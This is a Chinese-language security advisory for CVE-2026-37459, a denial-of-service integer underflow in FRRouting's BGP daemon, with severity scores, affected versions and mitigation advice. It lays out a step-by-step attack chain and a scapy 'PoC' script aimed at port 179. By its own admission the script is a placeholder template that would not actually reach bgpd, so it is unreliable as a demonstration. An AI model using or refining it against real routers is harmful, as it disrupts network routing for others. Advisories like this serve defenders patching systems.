CVE-2026-37459 CVSS 7.5 高危

CVE-2026-37459 FRRouting BGP整数下溢致拒绝服务漏洞

披露日期: 2026-05-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-37459

漏洞类型

整数下溢

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FRRouting (FRR)

漏洞概述

FRRouting在stable/10.0至stable/10.6版本中存在整数下溢漏洞。攻击者可通过发送特制的BGP UPDATE消息触发该漏洞，导致目标服务崩溃，造成拒绝服务。

技术细节

该漏洞源于FRR在处理BGP UPDATE消息时对特定属性长度计算不当。攻击者可构造恶意数据包，导致整数下溢，进而引发内存分配错误或缓冲区溢出。由于BGP通常运行在特权模式下，漏洞利用将导致bgpd进程崩溃，中断路由服务。

攻击链分析

STEP 1

侦察

扫描网络寻找开启BGP服务（端口179）的FRRouting设备。

STEP 2

构造

根据漏洞原理，构造包含特定长度字段的恶意BGP UPDATE消息。

STEP 3

发送

将恶意数据包发送给目标设备的BGP端口。

STEP 4

触发

目标设备解析数据包时触发整数下溢，导致进程崩溃。

STEP 5

影响

BGP服务停止，造成网络路由中断（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import sys
from scapy.all import *

def send_exploit(target_ip):
    # Crafted BGP UPDATE message to trigger integer underflow
    # This is a generic template; specific bytes depend on the patch diff
    marker = b'\xff' * 16
    len_header = b'\x00\x13' # Length placeholder
    type_msg = b'\x02' # UPDATE
    # Malicious payload simulation
    bgp_payload = marker + len_header + type_msg + b'A'*20
    
    pkt = IP(dst=target_ip)/TCP(dport=179, flags='PA', sport=49152)/Raw(load=bgp_payload)
    send(pkt, verbose=0)
    print(f"[*] Exploit packet sent to {target_ip}")

if __name__ == "__main__":
    send_exploit("192.168.1.1")

影响范围

FRRouting stable/10.0

FRRouting stable/10.1

FRRouting stable/10.2

FRRouting stable/10.3

FRRouting stable/10.4

FRRouting stable/10.5

FRRouting stable/10.6

防御指南

临时缓解措施

建议立即升级到修复版本。若无法升级，请严格限制TCP 179端口的访问来源，仅允许可信的对等体连接，并配置自动重启脚本以减少服务中断时间。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表